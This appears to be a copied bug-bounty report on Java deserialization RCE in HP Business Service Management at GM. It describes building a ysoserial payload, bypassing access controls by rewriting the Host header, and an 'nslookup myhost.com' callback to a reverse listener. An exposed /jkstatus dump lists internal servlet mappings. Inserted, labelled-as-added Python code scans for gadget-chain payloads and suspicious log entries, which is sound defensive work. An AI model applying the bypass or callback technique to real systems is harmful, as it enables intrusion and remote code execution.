Untitled
a guest, Jun 20th, 2017
#212459 Multiple Critical Java deserialization vulnerabilities in HP's Big Data Product leads to unauthenticated RCE.

State Informative (Closed)

Reported To General Motors

Scope

Weakness Code Injection

Severity Critical (9 ~ 10)

Participants cayce cubo hackerone-support

Visibility Private

Summary by cayce: Tilting at Windmills

Title: Multiple Critical Java deserialization vulnerabilities in HP's Big Data Product leads to unauthenticated RCE.
Weakness: Code Injection
Severity: Critical
Link: https://hackerone.com/reports/212459
Date: 2017-03-11 03:23:47 +0000
By: @cayce

Details:
Type:
Java deserialization RCE

Availability:
HP Business Service Management
/tvb/remoteProxy Servlet suffers from a serialization injection attack.
/bpi/remoteProxy Servlet suffers from a serialization injection attack.

Exploitability:
Remotely exploitable by any user.

Impact:
Successful exploitation provides the attacker the ability to perform remote code execution (RCE).
With this RCE, the attacker is able to deliver a shell to the host and proceed to full root
escalation (depending upon system hardening) and compromise of all logged (network,
server, application and business) transactions monitored.
Like WHOA!

Steps to repeat:
Replication:
1) Build a groovy serialization payload with something like this:
https://github.com/frohoff/ysoserial

2) Use the payload in a proxy/script/debugger to submit it to the server. (These endpoints are not initially publicly available but a quick change to the "Host" header solved that. I guess there is a broken FW/WAF/IAM solution in the mix as well?)

3) Harvest

PoCs:
(See attachment)

Root Causes:
1) This host CLEARLY was deployed without reading the "Hardening Guide" from the vendor.
The entire suite (it's BIG) deployed on the same node, o'Rly?

2) There must be issues with the change management process or the firewall technology used.
There is no reason for this sadly deployed node to be publicly accessible.

3) The previously mentioned unnecessarily installed "Feature" receives unvalidated input from
untrusted users.
By sending a payload such as 'nslookup myhost.com', the target will make the request to
myhost.com. myhost.com can provide a download/reverse listener via port 53. Escalation
and elevation ongoing.

Additional information:
https://www.sans.org/security-resources/mistakes
The Seven Worst Security Mistakes Senior Executives Make

****1: Assigning untrained people to maintain security and providing neither the training nor the time to make it possible to learn and do the job.****
This is a failure of 101s from the top down. I say this due to the choice to put all
the org's eggs in one "vendor centric" basket which, itself, has a gaping hole.
Or ought I say, without a bottom because, that's a better picture of the service
provided by the vendor/basket. Eggs go in for security yet, the entire business profile
becomes exposed for profit. One might ask for whom.
****2: Failing to understand the relationship of information security to the business problem-they understand physical security but do not see the consequences of poor information security.****
Somebody spent AND made a LOT of money with all these top tier "Enterprise Grade"
products yet, 101 security principles agreed upon for over two decades are ignored
without consequence.
"3: Failing to deal with the operational aspects of security: making a few fixes and then not allowing the follow through necessary to ensure the problems stay fixed"
We'll see; this node will likely simply be firewalled, rebuilt or pulled offline but,
there won't be sufficient policy change to prevent this in the future. Another
"Enterprise Grade"/ISACA "Certified" product will be rolled out again in the near future,
unhardened, without consequence.
****4: Relying primarily on a firewall.****
Port 53, wowwie; your perimeter team just doesn't get it ... at all.
****5: Failing to realize how much money their information and organizational reputations are worth.****
See response to mistake #2. THAT much money was spent to secure; they must be valuable assets.
****6: Authorizing reactive, short-term fixes so problems re-emerge rapidly.****
This is a must-have "Big Data" solution. Bad news, they don't EVER work when deployed
without the guidance of an experienced (as in YEARS, OSes, PROTOCOLS, ENVIRONMENTS, BADNESS)
system architect. I'm certain that was a line item from the vendor of this product. Did
this org rely on internal expertise or maybe find another contractor to be able to pin
the blame on?
****7: Pretending the problem will go away if they ignore it.****
Nobody will get axed, just less of an unwarranted bonus. All of the charlatans
that bought/sold/allowed/profited/created this mess will continue to do so.

The Ten Worst Security Mistakes Information Technology People Make

****1: Connecting systems to the Internet before hardening them.****
There's an "Administration Manual" as well as a "Hardening Guide" available from the vendor;
someone ought to read them. Not reference them, really just read them.
"2: Connecting test systems to the Internet with default accounts/passwords"
TBD 3: Failing to update systems when security holes are found. TBD
"4: Using telnet and other unencrypted protocols for managing systems, routers, firewalls, and PKI."
"5: Giving users passwords over the phone or changing user passwords in response to telephone or personal requests when the requester is not authenticated."
"6: Failing to maintain and test backups."
****7: Running unnecessary services, especially ftpd, telnetd, finger, rpc, mail, rservices****
Looks as though someone BLINDLY installed each and every downloadable installer available
from the vendor download page. Are they truly ALL in use? Doubt it.
****8: Implementing firewalls with rules that don't stop malicious or dangerous traffic-incoming or outgoing.****
"9: Failing to implement or update virus detection software"
****10: Failing to educate users on what to look for and what to do when they see a potential security problem.****
I was not "shy" during my testing. There ought to have been countless opportunities for
the SOC team to identify and protect affected assets. They are certainly using the
same vendor's product(s).

****And a bonus, number 11: Allowing untrained, uncertified people to take responsibility for securing important systems.****
How many members of the Security team are contractors and how many are internal employees?
What's the total years of modern, hands-on experience?

There are countless writeups and CVEs to support understanding this class of vulnerability.
Here is one:
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

Steps toward remediation:
a) Unplug this host. Acquire patches from the vendor. Review the "Hardening Guide". Rebuild
from scratch and restore data backups as necessary. Review the "Hardening Guide" again.
Perform internal testing and monitoring. Reconsider the purchase?

b) All change control and perimeter policies ought to be reviewed and hardened to prevent
access to internal nodes from untrusted external sources.

c) Maintain an internal threat feed that includes vulnerability discoveries. Ensure
analysts read AND understand them. This is a two year old apocalypse attack. This is
unsettling to say the least.

d) At the application layer, don't expose unnecessary services. If there is a business
use case for them to be available, perform input validation on all exposed end-points.

e) Stop buying security products you don't understand from vendors you can't trust
and start spending money on what works, people and process.

X) Get rid of the VERY expensive cookie cutter "Professional Services" consultants
and hire some hackers, maybe even BUILD a team?

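The report points at ysoserial for the payload and at "input validation on all exposed end-points" as the application-layer fix. What that validation can realistically do in front of a servlet that reads raw Java objects is shown by the following added example; it is not code from the report, from GM or from the vendor. It is a Python scanner for a request body that checks for the Java serialization stream header and then lists the class descriptors (TC_CLASSDESC) and string constants (TC_STRING) it carries, flagging the Commons-Collections classes used by the ysoserial CommonsCollections chains. The gadget-class list, the 256-byte length cap and the sample streams are assumptions made here; the samples are constructed to match the framing the scanner reads and are not loadable Java object graphs.

```python
import re
import struct

# Java serialization stream header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 5.
STREAM_HEADER = b"\xac\xed\x00\x05"
TC_NULL, TC_CLASSDESC, TC_OBJECT, TC_STRING, TC_ENDBLOCKDATA = 0x70, 0x72, 0x73, 0x74, 0x78

# A fully qualified class name or array descriptor (e.g. "[Ljava.lang.Object;").
# Used to reject 0x72 bytes that are not really a TC_CLASSDESC tag.
CLASS_NAME_RE = re.compile(
    rb"^\[*L?[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*;?$"
)

# Classes from the public Commons-Collections gadget chains shipped with
# ysoserial (CommonsCollections1 and relatives). Assumption of this example:
# a denylist is a detection aid only; new chains appear regularly, so the fix
# is to stop deserializing untrusted bytes or to allowlist classes.
GADGET_CLASSES = {
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.map.LazyMap",
    "sun.reflect.annotation.AnnotationInvocationHandler",
}
MAX_UTF = 256  # longest class name / string the heuristic accepts (assumed cap)


def _utf_at(data, i):
    """Length-prefixed (2-byte big-endian) text starting at data[i], or None."""
    if i + 2 > len(data):
        return None
    (n,) = struct.unpack(">H", data[i:i + 2])
    if n == 0 or n > MAX_UTF or i + 2 + n > len(data):
        return None
    return data[i + 2:i + 2 + n]


def scan_stream(data):
    """Heuristic scan of a request body: is it a Java serialized stream, and
    which class descriptors and string constants does it carry?"""
    result = {
        "is_java_stream": data.startswith(STREAM_HEADER),
        "classes": [], "strings": [], "gadgets": [], "verdict": "not-java",
    }
    if not result["is_java_stream"]:
        return result
    for i, tag in enumerate(data):
        if tag == TC_CLASSDESC:
            name = _utf_at(data, i + 1)
            if name and CLASS_NAME_RE.match(name):
                cls = name.decode("ascii")
                if cls not in result["classes"]:
                    result["classes"].append(cls)
        elif tag == TC_STRING:
            raw = _utf_at(data, i + 1)
            if raw and all(0x20 <= b < 0x7F for b in raw):
                result["strings"].append(raw.decode("ascii"))
    result["gadgets"] = [c for c in result["classes"] if c in GADGET_CLASSES]
    result["verdict"] = "gadget-chain" if result["gadgets"] else "java-object"
    return result


def build_sample_stream(class_names, strings=()):
    """Constructed test input. It follows the TC_OBJECT/TC_CLASSDESC framing
    closely enough for the scanner but is NOT a loadable Java object graph
    (zeroed serialVersionUID, no fields, no class data)."""
    out = bytearray(STREAM_HEADER)
    for cls in class_names:
        name = cls.encode("ascii")
        out += bytes([TC_OBJECT, TC_CLASSDESC]) + struct.pack(">H", len(name)) + name
        out += b"\x00" * 8                        # serialVersionUID (zeroed here)
        out += b"\x02"                            # classDescFlags: SC_SERIALIZABLE
        out += b"\x00\x00"                        # field count
        out += bytes([TC_ENDBLOCKDATA, TC_NULL])  # no annotations, no superclass
    for s in strings:
        raw = s.encode("ascii")
        out += bytes([TC_STRING]) + struct.pack(">H", len(raw)) + raw
    return bytes(out)


# Constructed samples: an Integer-like stream, and a CommonsCollections1-like
# layout carrying the reflection strings that chain uses to reach Runtime.exec.
BENIGN = build_sample_stream(["java.lang.Integer", "java.lang.Number"])
GADGET = build_sample_stream(sorted(GADGET_CLASSES), ["getRuntime", "exec"])

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("gadget", GADGET),
                        ("plain HTTP", b"GET /tvb/remoteProxy HTTP/1.1\r\n")):
        print(label, scan_stream(body)["verdict"])
```

This belongs in a WAF or a pre-filter in front of /tvb/remoteProxy and /bpi/remoteProxy as a compensating control, not as the fix: ysoserial carries chains that do not touch Commons Collections, and the scanner does not follow TC_REFERENCE back-references or proxy class descriptors. The durable fix is the vendor patch plus, on the Java side, an ObjectInputFilter allowlist (JEP 290, available from JDK 8u121 and JDK 9) or not accepting serialized objects on an Internet-facing servlet at all.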
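Mistake #10 above and the /jkstatus comment in the timeline both come down to visibility: the mod_jk worker map names exactly which URIs are forwarded to the Tomcat-side servlets, and the report says the endpoints were reached by rewriting the Host header. The following is an added example, not code from the report, from GM or from HP: a small Python rule set run over constructed Apache access-log lines (format `LogFormat "%h %{Host}i %t \"%r\" %>s %b"`, assumed for the example so that the Host header is logged) that flags external sources hitting the two remoteProxy servlets or /jkstatus, and any request whose Host header is not the public vhost. The IP addresses, the public vhost choice and the internal ranges are assumptions; the hostnames are the ones the report itself uses.

```python
import ipaddress
import re

# Assumed log format (not the page's):  LogFormat "%h %{Host}i %t \"%r\" %>s %b"
LOG_RE = re.compile(
    r'^(?P<src>\S+) (?P<host>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# The two deserialization sinks named in the report plus the mod_jk status page.
SENSITIVE_PATHS = {"/tvb/remoteProxy", "/bpi/remoteProxy", "/jkstatus"}

# Assumptions for the example: the one vhost meant to face the Internet, and the
# address ranges considered internal. Any other Host value is a client steering
# mod_jk's per-vhost URI map by hand.
PUBLIC_VHOSTS = {"vulnerable.host.gm.com"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_line(line):
    """One access-log line -> dict, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]          # drop query string
    rec["host"] = rec["host"].split(":", 1)[0].lower()  # drop explicit port
    return rec


def is_external(addr):
    """True unless the source parses as an address inside INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True  # unparsable source (proxy name, garbage): treat as untrusted
    return not any(ip in net for net in INTERNAL_NETS)


def detect(lines):
    """Return (rule, source, detail) tuples, in log order."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] in SENSITIVE_PATHS and is_external(rec["src"]):
            alerts.append(("external-sensitive-endpoint", rec["src"], rec["path"]))
        if rec["host"] not in PUBLIC_VHOSTS:
            alerts.append(("unexpected-host-header", rec["src"], rec["host"]))
    return alerts


# Constructed sample: 203.0.113.0/24 is a documentation range standing in for
# an Internet client; 10.20.30.40 stands in for a monitoring host on the LAN.
SAMPLE_LOG = [
    '203.0.113.7 internalsubsomain.was.here.gm.com [11/Mar/2017:00:20:01 -0500] '
    '"POST /tvb/remoteProxy HTTP/1.1" 200 512',
    '203.0.113.7 vulnerable.host.gm.com [11/Mar/2017:00:22:49 -0500] '
    '"GET /jkstatus HTTP/1.1" 200 84000',
    '10.20.30.40 internalsubsomain.was.here.gm.com [11/Mar/2017:00:25:10 -0500] '
    '"POST /bpi/remoteProxy HTTP/1.1" 200 1024',
    '203.0.113.7 vulnerable.host.gm.com [11/Mar/2017:00:26:00 -0500] '
    '"GET /topaz/TopazSiteServlet HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

The first rule is the one that would have fired on the testing described in the report; the second catches the Host-header trick even from inside the network, which matters because the mod_jk map above is keyed by vhost and a request for the internal name is the only way those servlets are reachable through the front-end Apache.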
Timeline:
2017-03-11 03:25:39 +0000: @cayce (comment)
Host: vulnerable.host.gm.com
HP Business Service Management (BSM) on production (prdm) segment.

---

2017-03-11 03:50:51 +0000: @cubo (bug triaged)
Thank you for your submission. We are investigating your report with the GM security team. We value your submission and will respond shortly with our findings.

---

2017-03-11 05:06:45 +0000: @cayce (comment)
For additional unauthenticated file/service enumeration, the endpoint "/jkstatus" is also exposed.

---

2017-03-11 05:24:30 +0000: @cayce (comment)
JK Status Manager for vulnerable.host.gm.com:443

Server Version: Apache/2.4.16 (Win32) OpenSSL/1.0.1p mod_jk/1.2.40 Server Time: Sat, 11 Mar 2017 00:22:49 Eastern Standard Time
JK Version: mod_jk/1.2.40 Unix Seconds: 1489209769

Listing AJP Workers (4 Workers)

Worker Status for localAjp

Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size
ajp13 127.0.0.1 127.0.0.1:8009 0 0 0 0 2 0

State Acc Err CE RE Wr Rd Busy Max Con LR LE
OK 452336 (1/sec) 0 1040 0 117T (484M/sec) 769T (3.1G/sec) 1 19 28 254462 Sat, 18 Feb 2017 11:51:48 Eastern Standard Time
URI Mappings for localAjp (378 maps)
  199.  
  200. Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
internalsubsomain.was.here.gm.com:80 /bpi/jsps/bpi/admin/modeler/lib/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /*/static/modelExplorer/gwt/MeTreeService Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/gdeopenapi/services/GdeWsOpenAPI Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/analytics/RealTimeChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/analytics/DynamicChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /axis2/services/DiscoveryService/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/analytics/ProcessServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/analytics/PortalsServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/personalization/project/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/analytics/AllerezServer/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/analytics/GroupServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/analytics/AdminServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /axis2/services/UcmdbService/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/analytics/KpiServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/AdminCenter/servlets/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/services/technical/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/services/business/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/analytics/servlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/gwt/charts/gwt-log Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/omi/integration/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/slm/customers/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bam/open_api/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bsmLight/BPM/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/eum/BPRTransactionDefinitionServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/services/EntityNotificationPort Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/eum/DownloadScriptServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /axis2/services/DiscoveryService Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/eum/DownloadALMZipServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/j2ee/DataCollectorServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /uim/composition_manager/*_srv* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/BacRepositoriesUI/*.rep Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/personalization/project Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/gdeopenapi/GdeOpenApi Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /axis2/services/UcmdbService Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/eum/TCPReportServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/SnapshotServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/monitoring_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/dwrsitescopeodm/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/rca/rcaFrontComp Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bam/*.bamNoProxy Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/eumreportsapi/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/servicehealth/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/omi/integration Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bpr/BPRServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bam/BAMOpenApi Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/slm/customers Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bsmservices/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/diagnostics/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/ldapContext/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/monitoring/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bsmLight/BPM Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/eumopenapi/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/dwrrunbook/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bpmappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/sitescope/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/eumappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /mercury/dynamic/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bsmLight/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bam/*.bam Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/tdm/*.tdm Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opal/uibridge/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/dwr-pi/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/siebel/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/appmon/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/acweb/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opal/admin/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/TMS/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/dwr/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opal/app/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/SLMGraphCallBackServletVer_41 Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/SymphonyRedirectionServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/OnlineDiagnosticServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/SLMGraphCallBackServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/authorizationmanagment Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/ColorsRetrieverServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/ConfigurationServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/kpiQueryServiceProxy Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/VTContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/authorizationcontrol Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/PrismHandlerServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/JapaneseHelpServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /filters/CategoriesServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/VisualFlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/SLMCallbackServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/businessimpactapi Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/JavaScriptServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /filters/FiltersServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/CMSImagesServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/TopazSwitchboard Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/CallbackServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/SlmSiteServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/LegendsServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/isolateProblem Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-config-server/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/servicehealth Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/FlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /utility_portlets/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-admin-server/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /freshwater_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-cpdiff-tool/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bsmservices Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/ldapContext Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /mam-collectors/* Wildchar uriworkermap -1 0 0 - - - - 0
